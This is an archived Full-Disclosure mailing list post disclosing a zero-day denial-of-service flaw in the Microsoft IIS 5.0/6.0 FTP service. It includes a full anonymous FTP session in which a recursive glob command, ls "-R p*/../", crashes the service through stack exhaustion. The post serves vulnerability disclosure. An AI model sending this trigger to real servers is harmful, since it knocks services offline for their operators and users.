Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email email@example.com
From: Kingcope (kcope2googlemail.com)
Date: Thu Sep 03 2009 - 16:53:52 CDT
***** MS IIS FTPD DoS ZER0DAY *****
There is a DoS vulnerability in the globbing functionality of IIS FTPD.
Anonymous users can exploit this if they have read access to a directory!!!
Normal users can exploit this too if they can read a directory.
Example session where the anonymous user has read access to the folder "pub":
Verbindung mit 192.168.2.102 wurde hergestellt.
220 Microsoft FTP Service
Benutzer (192.168.2.102:(none)): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
230 Anonymous user logged in.
ftp> ls "-R p*/../"
Verbindung beendet durch Remotehost. (MEANS: Remote Host has closed
By looking into my debugging session with OllyDbg I see that an
exception is raised and
the ftp service crashes due to a "stack overflow", what is a stack exhaustion.
If the ftp service is set to "manual" startup in services control
manager the service
needs to be restarted manually.
IIS 5.0 and 6.0 were tested and are affected.
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/